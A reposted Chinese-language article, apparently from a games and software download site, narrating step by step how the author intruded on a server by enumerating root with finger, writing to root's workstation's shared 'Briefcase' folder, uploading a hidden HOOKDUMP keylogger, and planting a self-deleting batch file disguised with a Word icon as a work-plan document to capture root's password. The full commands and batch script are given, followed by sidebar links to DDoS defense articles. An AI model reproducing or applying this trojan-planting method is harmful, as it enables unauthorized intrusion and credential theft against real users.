当前位置: 首页
网络安全
黑客入侵Linux操作系统的完整过程与步骤详解

黑客入侵Linux操作系统的完整过程与步骤详解

时间:2026-07-29
转载

在一次偶然的渗透测试中,发现了一个目标网站,便顺手尝试了常规入侵手段。Finger服务处于开启状态,于是先编写一个Shell脚本,从aaa尝试到zzz——顺便提一句,这算是我总结的一个小规律:账号长度与口令强度往往成正比,两三位字符的账号口令通常较为简单,反之亦然,暂且称之为“若氏定理”。结果所有账

在一次偶然的渗透测试中,发现了一个目标网站,便顺手尝试了常规入侵手段。Finger服务处于开启状态,于是先编写一个Shell脚本,从aaa尝试到zzz——顺便提一句,这算是我总结的一个小规律:账号长度与口令强度往往成正比,两三位字符的账号口令通常较为简单,反之亦然,暂且称之为“若氏定理”。结果所有账号均不存在,便没有再继续。真正引起我注意的是其开放的端口:WWW服务正在运行,我不信它不会出错。一口气用了五种CGI与WWW漏洞扫描器,扫描了三四百种常见漏洞,几乎找不到任何突破口。虽然有几个错误提示,但不知如何利用,只好作罢。绕着主机转了几圈,就像狐狸遇到刺猬,无从下口。

那就先查看一下root的信息:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.

root经常登录,那个202.xx.xx.xx就是其使用的工作站。从那里能否找到一些线索?
net view \\202.xx.xx.xx
Shared resources at \\202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.

很多人在上网的机器上开启了Windows的“文件和打印机共享”,却往往掉以轻心,这位root也不例外。如果C盘共享且可写那就太好了,但显然这是不现实的——当前共享的目录没有一个根目录,连D盘都没有。别急,慢慢来。那些被x掉的文件夹都没有写入权限,里面全是英文原著,看来这位root还挺有文化。“我的公文包”引起了我的注意——这是一个用于多台机器同步资料的工具。显然,root需要经常更新主机上的主页,有时在自己机器上编写,有时在主机上编写……关键在于,“我的公文包”的共享通常都是可写的。

那就再进去看看。
>net use i: \\202.xx.xx.xx
>i:
>echo asdf>temp.txt
不错,确实具备写入权限。
>del temp.txt
不留痕迹——这是黑客的习惯。
>dir/od/p
看看都有哪些文件……倒数第二排那个是什么?“X月工作计划.doc”!就是它了。既然是工作计划,就不可能写完就丢弃,它一定会再次打开——至少下个月写计划时需要复制一份。

该动手了。目标是让root下次打开这个文件时不小心触发陷阱,运行我隐藏的木马。这次使用的是键盘记录软件HOOKDUMP,它确实非常出色——不仅记录所有击键,还能记录打开了什么程序、点击了哪些按钮、使用了哪些菜单……总之,记录下来的信息就像你站在他身后看他操作计算机一样详细。可能有人会问:那么多木马为什么偏偏选这个?要知道,无论是国内的冰河、netspy,还是国外的netbus、BO,都已被各类杀毒软件列为重点侦查对象。一个root的机器上怎么可能不安装杀毒软件?HOOKDUMP小巧且不起眼,不过如果大家都用,它以后就不好使了。

>copy hookdump.* i:
补充一点:上传前需要先编辑好hookdump.ini文件,设置为隐藏方式运行,否则root一运行屏幕上突然蹦出一个大窗口可就麻烦了。

然后在自己机器上编写一个同名的BAT文件:X月工作计划.BAT
>edit c:\X月工作计划.BAT
@echo off
hookdump
attrib -h X月工作计划.doc
C:\Program Files\Microsoft\Office\Winword X月工作计划.doc
attrib -h temp.bat
del temp.pif
del temp.bat

看明白了吧?root运行这个BAT文件,实际上就是先执行木马,再调用WINWORD打开他原本想打开的文档,然后自动删除自身。如果他的机器上WINWORD路径不同,调用就会失败,不过没关系,BAT会立即删除,他会以为是自己的误操作。

这时C盘根目录便有了这个BAT文件,它是一个方形图标,与那个WORD文件截然不同,root怎么会去运行它呢?没关系,在这个文件上右键点击,选择属性,在“程序”栏中点击“更改图标”不就行了?WORD的图标就在自己机器C:\Program Files\Microsoft\Office\中。还需要将“运行”改为“最小化”,勾选“退出时关闭”,这样运行时毫无痕迹。事实上这个BAT文件变成了两个,还有一个PIF文件就是它的图标。

把这两个文件上传上去:
>copy X月工作计划.bat i:
>copy X月工作计划.pif i:
然后将他自己的文件和我的文件都隐藏起来:
>attrib h X月工作计划.doc
>attrib h X月工作计划.bat

这样一来,root的“公文包”里只剩下一个与原来一模一样的WORD图标,他做梦也没想到这已经变成了一个BAT文件。然后可以喘口气了,静静等待……

几天后,入侵这个工作站,取回键盘记录,找到root的口令,成功进入主机。

游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。

同类文章
更多
DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击主要分为基于流量(Volume)、基于应用层(Application)和基于协议(Protocol)三种形式。流量型攻击通过海量数据淹没带宽;应用层攻击利用Web漏洞耗尽服务器资源;协议层攻击则利用TCP握手缺陷导致系统挂起。了解这些原理是制定针对性防御策略的基础。

时间:2026-08-31 11:56
如何有效预防和缓解DDoS攻击:5大核心策略详解

如何有效预防和缓解DDoS攻击:5大核心策略详解

面对DDoS攻击,单纯增加带宽已非长久之计。本文详解5大核心防护策略:优化网络硬件配置、建立DNS冗余机制、部署透明缓解技术、引入负载平衡器及专用Anti-DDoS模块。通过合理组合这些技术手段,可有效抵御SYN泛洪、Slowloris等常见攻击,保障业务连续性与网站可用性。

时间:2026-08-31 11:56
DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

许多企业误以为CDN、防火墙或黑名单能完全抵御DDoS攻击。本文深入解析四大常见误区:CDN仅提供部分缓解、静态黑名单易失效、防火墙算力有限且可能成为目标、阈值警报仅具滞后性。了解这些局限性,有助于构建更立体的防御体系,避免在攻击发生时措手不及。

时间:2026-08-31 11:55
常见DDoS攻击类型详解:原理、特征与防御策略

常见DDoS攻击类型详解:原理、特征与防御策略

本文详细解析四种常见DDoS攻击类型:SYN Flood利用TCP三次握手缺陷耗尽资源;UDP Flood通过海量数据包造成带宽拥塞;ICMP Flood利用Ping请求消耗系统算力;应用层Flood针对Web脚本进行高频请求。了解其原理是制定有效防御策略的基础。

时间:2026-08-31 11:55
如何有效抵御DDOS攻击:4种核心防护方案解析

如何有效抵御DDOS攻击:4种核心防护方案解析

面对DDOS攻击,企业需构建多层防护体系。本文详解四大核心策略:利用反向路由器查询进行流量清洗,通过GCDN智能分配节点隐藏源站IP,部署负载均衡硬件分担压力,以及接入高防机房抵御数百G恶意流量。掌握这些技术,可最大程度保障业务连续性。

时间:2026-08-31 11:54
热门专题
更多
刀塔传奇破解版无限钻石下载大全 刀塔传奇破解版无限钻石下载大全
洛克王国正式正版手游下载安装大全 洛克王国正式正版手游下载安装大全
思美人手游下载专区 思美人手游下载专区
好玩的阿拉德之怒游戏下载合集 好玩的阿拉德之怒游戏下载合集
不思议迷宫手游下载合集 不思议迷宫手游下载合集
百宝袋汉化组游戏最新合集 百宝袋汉化组游戏最新合集
jsk游戏合集30款游戏大全 jsk游戏合集30款游戏大全
宾果消消消原版下载大全 宾果消消消原版下载大全